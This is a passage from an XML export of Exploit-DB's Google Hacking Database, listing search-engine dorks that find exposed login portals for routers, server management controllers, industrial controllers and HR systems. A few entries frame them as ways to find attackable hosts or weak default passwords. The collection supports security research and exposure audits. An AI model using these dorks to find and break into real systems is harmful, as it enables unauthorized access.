<edb></edb>
<date>2005-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1296</id>
<link>https://www.exploit-db.com/ghdb/1296</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;EZPartner&quot; -netpond</shortDescription>
<textualDescription>EZPartner is a great marketing tool that will help you increase your sales by sending webmaster affiliate traffic to your sites. This search finds the logins.</textualDescription>
<query>intitle:&quot;EZPartner&quot; -netpond</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22EZPartner%22+-netpond</querystring>
<edb></edb>
<date>2006-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7179</id>
<link>https://www.exploit-db.com/ghdb/7179</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;F660&quot; intext:&quot;ZTE Corporation. All rightsreserved.&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;F660&quot; intext:&quot;ZTE Corporation. All rights reserved.&quot;
# Pages Containing Login Portals
# Date: 06/09/2021
# Exploit Author: Herve Yao Nyhl
</textualDescription>
<query>intitle:&quot;F660&quot; intext:&quot;ZTE Corporation. All rightsreserved.&quot;</query>
<querystring>https://www.google.com/search?q=Dork</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>Herve Yao Nyhl</author>
</entry>
<entry>
<id>7186</id>
<link>https://www.exploit-db.com/ghdb/7186</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;faculty login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;faculty login&quot;
# Pages Containing Login Portals
# Date: 08/09/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>intitle:&quot;faculty login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;faculty login&quot;</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7204</id>
<link>https://www.exploit-db.com/ghdb/7204</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;faculty login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;faculty login&quot;
# Pages Containing Login Portals
# Date: 09/09/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>intitle:&quot;faculty login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;faculty login&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7164</id>
<link>https://www.exploit-db.com/ghdb/7164</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;fdt&quot; intext:&quot;Remember me&quot; &quot;Username&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;fdt&quot; intext:&quot;Remember me&quot; &quot;Username&quot;
# Pages Containing Login Portals
# Date: 02/09/2021
# Exploit Author: Neha Singh
</textualDescription>
<query>intitle:&quot;fdt&quot; intext:&quot;Remember me&quot; &quot;Username&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;fdt&quot; intext:&quot;Remember me&quot; &quot;Username&quot;</querystring>
<edb></edb>
<date>2021-09-07</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>4209</id>
<link>https://www.exploit-db.com/ghdb/4209</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;FirstSpirit - login&quot;</shortDescription>
<textualDescription>Description: FirstSpirit Content Management System login page
Google search: intitle:&quot;FirstSpirit - login&quot;
Author: nebo_oben</textualDescription>
<query>intitle:&quot;FirstSpirit - login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;FirstSpirit - login&quot;</querystring>
<edb></edb>
<date>2016-03-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>917</id>
<link>https://www.exploit-db.com/ghdb/917</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Flash Operator Panel&quot; -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists</shortDescription>
<textualDescription>Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time.</textualDescription>
<query>intitle:&quot;Flash Operator Panel&quot; -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Flash+Operator+Panel%22+-ext%3Aphp+-wiki+-cms+-inurl%3Aasternic+-inurl%3Asip+-intitle%3AANNOUNCE+-inurl%3Alists+</querystring>
<edb></edb>
<date>2005-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5971</id>
<link>https://www.exploit-db.com/ghdb/5971</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Fortinet - Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Fortinet - Login&quot;
# Pages containing Login Portals.
# Date: 30/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Fortinet - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Fortinet - Login&quot;</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6877</id>
<link>https://www.exploit-db.com/ghdb/6877</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Frontier e-HR Login Page&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Frontier e-HR Login Page&quot;
# Pages Containing Login Portals(EMR Systems)
# Date: 15/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Frontier e-HR Login Page&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Frontier e-HR Login Page&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6938</id>
<link>https://www.exploit-db.com/ghdb/6938</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Gargoyle Router Management Utility&quot; intext:&quot;Enter Admin Password&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Gargoyle Router Management Utility&quot; intext:&quot;Enter Admin Password&quot;</textualDescription>
<query>intitle:&quot;Gargoyle Router Management Utility&quot; intext:&quot;Enter Admin Password&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Gargoyle Router Management Utility&quot; intext:&quot;Enter Admin Password&quot;</querystring>
<edb></edb>
<date>2021-05-18</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7056</id>
<link>https://www.exploit-db.com/ghdb/7056</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;geovision inc.&quot; inurl:login.htm</shortDescription>
<textualDescription># Google Dork: intitle:&quot;geovision inc.&quot; inurl:login.htm
# Category: Various Online Devices
# Date: 06/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;geovision inc.&quot; inurl:login.htm</query>
<querystring>https://www.google.com/search?q=intitle:&quot;geovision inc.&quot; inurl:login.htm</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7178</id>
<link>https://www.exploit-db.com/ghdb/7178</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Gitea&quot; &quot;This website works better with JavaScript&quot; &quot;sign in&quot; &quot; Home&quot; &quot;Explore&quot;-.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;WATTrouter&quot; &quot;SYSTEM WEB INTERFACE&quot;
# Pages Containing Login Portals
# Date: 06/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Gitea&quot; &quot;This website works better with JavaScript&quot; &quot;sign in&quot; &quot; Home&quot; &quot;Explore&quot;-.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Gitea&quot; &quot;This website works better with JavaScript&quot; &quot;sign in&quot; &quot; Home&quot; &quot;Explore&quot;-.com</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6933</id>
<link>https://www.exploit-db.com/ghdb/6933</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;GLPI - Authentication&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;GLPI - Authentication&quot;</textualDescription>
<query>intitle:&quot;GLPI - Authentication&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;GLPI - Authentication&quot;</querystring>
<edb></edb>
<date>2021-05-14</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7002</id>
<link>https://www.exploit-db.com/ghdb/7002</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;GLPI - Аутентификация&quot; intext:&quot;GLPI Copyright&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;GLPI - Аутентификация&quot; intext:&quot;GLPI Copyright&quot;
# Pages Containing Login Portals
# Date: 09/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;GLPI - Аутентификация&quot; intext:&quot;GLPI Copyright&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;GLPI - Аутентификация&quot; intext:&quot;GLPI Copyright&quot;</querystring>
<edb></edb>
<date>2021-06-11</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6507</id>
<link>https://www.exploit-db.com/ghdb/6507</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;GoAnywhere Web Client - Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;GoAnywhere Web Client - Login&quot;
# Login portals.
# Date: 29/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;GoAnywhere Web Client - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;GoAnywhere Web Client - Login&quot;</querystring>
<edb></edb>
<date>2020-08-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6911</id>
<link>https://www.exploit-db.com/ghdb/6911</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Gophish - Login&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Gophish - Login&quot;
# This dork found Gophish login panel.
# Category : Pages Containing Login Portals
# Author : Murat DEMİRCİ
</textualDescription>
<query>intitle:&quot;Gophish - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Gophish - Login&quot;</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>Murat DEMİRCİ</author>
</entry>
<entry>
<id>7550</id>
<link>https://www.exploit-db.com/ghdb/7550</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Gophish - Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Gophish - Login&quot;
# Pages Containing Login Portals
# Date:31/10/2021
# Exploit Author: Piyush Patil</textualDescription>
<query>intitle:&quot;Gophish - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Gophish - Login&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Piyush Patil</author>
</entry>
<entry>
<id>6919</id>
<link>https://www.exploit-db.com/ghdb/6919</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;grafana&quot; inurl:&quot;/grafana/login&quot; &quot;Forgot your password&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;grafana&quot; inurl:&quot;/grafana/login&quot; &quot;Forgot your password&quot;
# Pages Containing Online Portals
# Date: 03/05/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;grafana&quot; inurl:&quot;/grafana/login&quot; &quot;Forgot your password&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;grafana&quot; inurl:&quot;/grafana/login&quot; &quot;Forgot your password&quot;</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7046</id>
<link>https://www.exploit-db.com/ghdb/7046</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Grandstream Device Configuration&quot; (intext:password &amp; intext:&quot;Grandstream Device Configuration&quot; &amp; intext:&quot;Grandstream Networks&quot; | inurl:cgi-bin) -.com|org</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Grandstream Device Configuration&quot; (intext:password
&amp; intext:&quot;Grandstream Device Configuration&quot; &amp; intext:&quot;Grandstream Networks&quot;
| inurl:cgi-bin) -.com|org
# Category: Pages Containing Login Portals
# Date: 06/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Grandstream Device Configuration&quot; (intext:password &amp; intext:&quot;Grandstream Device Configuration&quot; &amp; intext:&quot;Grandstream Networks&quot; | inurl:cgi-bin) -.com|org</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Grandstream Device Configuration&quot; (intext:password &amp; intext:&quot;Grandstream Device Configuration&quot; &amp; intext:&quot;Grandstream Networks&quot; | inurl:cgi-bin) -.com|org</querystring>
<edb></edb>
<date>2021-08-12</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6884</id>
<link>https://www.exploit-db.com/ghdb/6884</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Greentree eHR&quot; &quot;Employee Code&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Greentree eHR&quot; &quot;Employee Code&quot;
# Pages Containing Login Portals
# Date: 15/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Greentree eHR&quot; &quot;Employee Code&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Greentree eHR&quot; &quot;Employee Code&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>4208</id>
<link>https://www.exploit-db.com/ghdb/4208</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Helm : The Web Hosting Control System&quot;</shortDescription>
<textualDescription>Description: Helm Control Panel login page
Google search: intitle:&quot;Helm : The Web Hosting Control System&quot;
Autor: nebo_oben</textualDescription>
<query>intitle:&quot;Helm : The Web Hosting Control System&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Helm : The Web Hosting Control System&quot;</querystring>
<edb></edb>
<date>2016-03-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>6477</id>
<link>https://www.exploit-db.com/ghdb/6477</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Helpdesk Software Login&quot; &quot;login&quot; &quot;by Jitbit&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Helpdesk Software Login&quot; &quot;login&quot; &quot;by Jitbit&quot;
# Ticketing Systems login portals.
# Date: 12/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Helpdesk Software Login&quot; &quot;login&quot; &quot;by Jitbit&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Helpdesk Software Login&quot; &quot;login&quot; &quot;by Jitbit&quot;</querystring>
<edb></edb>
<date>2020-08-12</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4235</id>
<link>https://www.exploit-db.com/ghdb/4235</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Honeywell XL Web Controller - Login&quot; (inurl:&quot;standard/default.php&quot; | inurl:&quot;standard/header/header.php&quot; | inurl:&quot;standard/mainframe.php&quot; | inurl:&quot;standard/footer/footer.php&quot; | inurl:&quot;standard/update.php&quot;)</shortDescription>
<textualDescription>Description: Honeywell XL Web Controller login page
Google search: intitle:&quot;Honeywell XL Web Controller - Login&quot;
(inurl:&quot;standard/default.php&quot; | inurl:&quot;standard/header/header.php&quot; |
inurl:&quot;standard/mainframe.php&quot; | inurl:&quot;standard/footer/footer.php&quot; |
inurl:&quot;standard/update.php&quot;)
Author: nebo_oben</textualDescription>
<query>intitle:&quot;Honeywell XL Web Controller - Login&quot; (inurl:&quot;standard/default.php&quot; | inurl:&quot;standard/header/header.php&quot; | inurl:&quot;standard/mainframe.php&quot; | inurl:&quot;standard/footer/footer.php&quot; | inurl:&quot;standard/update.php&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Honeywell XL Web Controller - Login&quot; (inurl:&quot;standard/default.php&quot; | inurl:&quot;standard/header/header.php&quot; | inurl:&quot;standard/mainframe.php&quot; | inurl:&quot;standard/footer/footer.php&quot; | inurl:&quot;standard/update.php&quot;)</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>7130</id>
<link>https://www.exploit-db.com/ghdb/7130</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Honeywell XL Web Controller&quot; intext:&quot;systemadmin&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Honeywell XL Web Controller&quot; intext:&quot;systemadmin&quot;
# Category: Pages Containing Login Portals
# Date: 06/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Honeywell XL Web Controller&quot; intext:&quot;systemadmin&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Honeywell XL Web Controller&quot; intext:&quot;systemadmin&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6131</id>
<link>https://www.exploit-db.com/ghdb/6131</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;HP System Management Homepage&quot; inurl:cpqlogin</shortDescription>
<textualDescription># Google Dork: intitle:&quot;HP System Management Homepage&quot; inurl:cpqlogin
# Description: Find HP System Management Homepage.
# Author: Carlos Ramírez L. (BillyV4)
</textualDescription>
<query>intitle:&quot;HP System Management Homepage&quot; inurl:cpqlogin</query>
<querystring>https://www.google.com/search?q=intitle:&quot;HP System Management Homepage&quot; inurl:cpqlogin</querystring>
<edb></edb>
<date>2020-05-27</date>
<author>BillyV4</author>
</entry>
<entry>
<id>7487</id>
<link>https://www.exploit-db.com/ghdb/7487</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;HRMS&quot; inurl:&quot;login.aspx&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;HRMS&quot; inurl:&quot;login.aspx&quot;
# Pages Containing Login Portals
# Date:25/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;HRMS&quot; inurl:&quot;login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;HRMS&quot; inurl:&quot;login.aspx&quot;</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Suman Das</author>
</entry>
<entry>
<id>6987</id>
<link>https://www.exploit-db.com/ghdb/6987</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Huawei Inner Web&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Huawei Inner Web&quot;</textualDescription>
<query>intitle:&quot;Huawei Inner Web&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Huawei Inner Web&quot;</querystring>
<edb></edb>
<date>2021-06-07</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6738</id>
<link>https://www.exploit-db.com/ghdb/6738</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Humatrix 8&quot;</shortDescription>
<textualDescription># Exploit Title: HUMANICA Humatrix login portals
# Google Dork: intitle:&quot;Humatrix 8&quot;
# Author: Kitchaphan Singchai (idealphase)
# Category: Pages Containing Login Portals
</textualDescription>
<query>intitle:&quot;Humatrix 8&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Humatrix 8&quot;</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>idealphase</author>
</entry>
<entry>
<id>7540</id>
<link>https://www.exploit-db.com/ghdb/7540</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;I-Portal&quot; inurl:&quot;login.jsp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;I-Portal&quot; inurl:&quot;login.jsp&quot;
# Pages Containing Login Portals
# Date: 30/10/2021
# Exploit Author: Jawhar Milkan</textualDescription>
<query>intitle:&quot;I-Portal&quot; inurl:&quot;login.jsp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;I-Portal&quot; inurl:&quot;login.jsp&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>jawhar milkan</author>
</entry>
<entry>
<id>1127</id>
<link>https://www.exploit-db.com/ghdb/1127</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;i-secure v1.1&quot; -edu</shortDescription>
<textualDescription>I-Secure Login Pages</textualDescription>
<query>intitle:&quot;i-secure v1.1&quot; -edu</query>
<querystring>https://www.google.com/search?q=intitle:%22i-secure+v1.1%22+-edu&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>7122</id>
<link>https://www.exploit-db.com/ghdb/7122</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;IBM iNotes Login&quot; &quot;Ultralite Login Screen&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;IBM iNotes Login&quot; &quot;Ultralite Login Screen&quot;
# Category: Pages Containing Login Portals
# Date: 05/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;IBM iNotes Login&quot; &quot;Ultralite Login Screen&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;IBM iNotes Login&quot; &quot;Ultralite Login Screen&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6123</id>
<link>https://www.exploit-db.com/ghdb/6123</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Ice Hrm Login&quot; intext:&quot;Forgot Password&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Ice Hrm Login&quot; intext:&quot;Forgot Password&quot;
# Pages containing login portals, where some of them use weak passwords,
like admin/admin.
# Date: 25/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Ice Hrm Login&quot; intext:&quot;Forgot Password&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Ice Hrm Login&quot; intext:&quot;Forgot Password&quot;</querystring>
<edb></edb>
<date>2020-05-25</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>661</id>
<link>https://www.exploit-db.com/ghdb/661</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Icecast Administration Admin Page&quot;</shortDescription>
<textualDescription>Icecast streaming audio server web admin.This gives you a list of connected clients. Interesting way of finding attackable client computers.</textualDescription>
<query>intext:&quot;Icecast Administration Admin Page&quot; intitle:&quot;Icecast Administration Admin Page&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3A%22Icecast+Administration+Admin+Page%22</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>7022</id>
<link>https://www.exploit-db.com/ghdb/7022</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Identity Services Engine&quot; inurl:login.jsp</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Identity Services Engine&quot; inurl:login.jsp
# Pages Containing Login Portals
# Date: 20/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>intitle:&quot;Identity Services Engine&quot; inurl:login.jsp</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Identity Services Engine&quot; inurl:login.jsp</querystring>
<edb></edb>
<date>2021-07-21</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>1145</id>
<link>https://www.exploit-db.com/ghdb/1145</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;iDevAffiliate - admin&quot; -demo</shortDescription>
<textualDescription>Affiliate Tracking Software Adding affiliate tracking software to your site is one of the most effective ways to achieve more sales and more traffic! Our affiliate software installs in just minutes and integrates easily intoyour existing website.</textualDescription>
<query>intitle:&quot;iDevAffiliate - admin&quot; -demo</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22iDevAffiliate+-+admin%22+-demo</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>5158</id>
<link>https://www.exploit-db.com/ghdb/5158</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;iDRAC-login&quot;</shortDescription>
<textualDescription>Search: Integrated Dell Remote Access Controller - Enterprise
Google Dorks: intitle:&quot;iDRAC-login&quot;
Category : Various Online Devices
Exploit Author:- Harsh Mukeshbhai Joshi
</textualDescription>
<query>intitle:&quot;iDRAC-login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;iDRAC-login&quot;</querystring>
<edb></edb>
<date>2019-03-22</date>
<author>Inspira Enterprise Pvt Ltd</author>
</entry>
<entry>
<id>7100</id>
<link>https://www.exploit-db.com/ghdb/7100</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;idrac7 - Login&quot; inurl:login.html</shortDescription>
<textualDescription># Google Dork: intitle:&quot;idrac7 - Login&quot; inurl:login.html
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;idrac7 - Login&quot; inurl:login.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;idrac7 - Login&quot; inurl:login.html</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>8084</id>
<link>https://www.exploit-db.com/ghdb/8084</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Ignition Gateway&quot; &quot;launch designer&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Ignition Gateway&quot; &quot;launch designer&quot;
# Pages Containing Login Portals
# Date:24/02/2023
# Exploit Author: GirlsLearnCyber</textualDescription>
<query>intitle:&quot;Ignition Gateway&quot; &quot;launch designer&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Ignition Gateway&quot; &quot;launch designer&quot;</querystring>
<edb></edb>
<date>2023-02-24</date>
<author>GirlsLearnCyber</author>
</entry>
<entry>
<id>5229</id>
<link>https://www.exploit-db.com/ghdb/5229</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;iLO Login&quot; intext:&quot;Integrated Lights-Out 3&quot;</shortDescription>
<textualDescription>intitle:&quot;iLO Login&quot; intext:&quot;Integrated Lights-Out 3&quot;
Descrption: Find HP / HPE ilo 3 pages exposed to the Internet and
discovered by Google.
Author:
Fabio Stoll (Fastor)</textualDescription>
<query>intitle:&quot;iLO Login&quot; intext:&quot;Integrated Lights-Out 3&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;iLO Login&quot; intext:&quot;Integrated Lights-Out 3&quot;</querystring>
<edb></edb>
<date>2019-05-29</date>
<author>Fabio Stoll</author>
</entry>
<entry>
<id>6893</id>
<link>https://www.exploit-db.com/ghdb/6893</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;iLo&quot; &quot;Hewlett Packard Enterprise Development&quot; &quot;Firmware Version&quot; &quot; Local user name:&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;iLo&quot; &quot;Hewlett Packard Enterprise Development&quot; &quot;Firmware Version&quot; &quot;Local user name:&quot;
# Pages Containing Login Portals
# Date: 20/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;iLo&quot; &quot;Hewlett Packard Enterprise Development&quot; &quot;Firmware Version&quot; &quot; Local user name:&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;iLo&quot; &quot;Hewlett Packard Enterprise Development&quot; &quot;Firmware Version&quot; &quot; Local user name:&quot;</querystring>
<edb></edb>
<date>2021-04-23</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6773</id>
<link>https://www.exploit-db.com/ghdb/6773</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;iLO: localhost&quot; + &quot;Firmware Version&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;iLO: localhost&quot; + &quot;Firmware Version&quot;
# Pages containing login portals.
# Date: 28/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;iLO: localhost&quot; + &quot;Firmware Version&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;iLO: localhost&quot; + &quot;Firmware Version&quot;</querystring>
<edb></edb>
<date>2021-02-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7016</id>
<link>https://www.exploit-db.com/ghdb/7016</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;iMana 200 login&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;iMana 200 login&quot;
</textualDescription>
<query>intitle:&quot;iMana 200 login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;iMana 200 login&quot;</querystring>
<edb></edb>
<date>2021-07-02</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7885</id>
<link>https://www.exploit-db.com/ghdb/7885</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;index of&quot; &quot; *admin-login.php &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot; *admin-login.php &quot;
# Pages Containing Login Portals
# Date:16/12/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot; *admin-login.php &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot; *admin-login.php &quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6216</id>
<link>https://www.exploit-db.com/ghdb/6216</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;index of&quot; &quot;admin-login.php&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;admin-login.php&quot;
Description: This google dorks lists out admin login php pages on web servers.
Author: Abhi Chitkara
</textualDescription>
